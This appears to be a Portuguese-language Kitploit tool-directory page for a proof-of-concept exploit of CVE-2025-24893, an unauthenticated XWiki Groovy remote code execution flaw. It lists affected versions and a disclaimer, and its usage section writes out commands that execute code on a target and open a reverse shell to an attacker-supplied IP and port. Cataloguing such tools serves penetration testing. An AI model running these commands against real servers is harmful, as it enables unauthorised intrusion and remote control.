Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24893-PoC — Exploit de RCE não autenticado do XWiki para Shell Reverso | Kitploit
Ferramentas/GitHubGitHub/80ottanta80/cve-2025-24893-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHub80ottanta80/cve-2025-24893-poc

CVE-2025-24893-PoC

Exploit de RCE não autenticado do XWiki para Shell Reverso

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24893-PoC

Exploit de RCE não autenticado no XWiki

Versões XWiki Afetadas

  • Versões < 15.10.11
  • Versões < 16.4.1
  • Versões < 16.5.0RC1

Descrição da Vulnerabilidade

As versões afetadas do XWiki contêm uma vulnerabilidade de Execução Remota de Código causada pelo tratamento inseguro de expressões Groovy na macro SolrSearch. Atacantes não autenticados podem executar código Groovy arbitrário remotamente e obter um shell reverso.

Prova de Conceito

Este exploit pode ser usado para executar código na máquina alvo e também pode estabelecer um shell reverso. Dois modos estão disponíveis: interativo ou baseado em parâmetros. O exploit pode iniciar automaticamente um listener ou usar um existente.

Saída Interativa do XWiki

Pré-requisitos

Máquina do Atacante

  • Python 3
  • O script do exploit
  • Netcat (se não estiver usando o listener automático)

Máquina Alvo

  • Versão vulnerável do XWiki
  • Conectividade de rede com a máquina do atacante

Uso

Modo Interativo

root@kitploit:~
python3 xwiki_groovy_rce.py

Modo de Parâmetros

root@kitploit:~
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener

Parâmetros

-h/--help: Mostrar o menu de ajuda

-u/--url: URL alvo do XWiki (obrigatório)

-r/--reverse-shell: Executar um shell reverso

-c/--command: Executar um único comando

-i/--ip: Especificar IP do listener (apenas para shell reverso)

-p/--port: Especificar porta do listener (apenas para shell reverso, padrão=4444)

--no-listener: Não iniciar um listener (apenas para shell reverso)

Referência

  • https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • https://www.offsec.com/blog/cve-2025-24893/

Aviso Legal

Esta prova de conceito é apenas para fins educacionais e de teste autorizado.

O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.

Os autores não são responsáveis por qualquer uso indevido desta informação.

Baixar ferramenta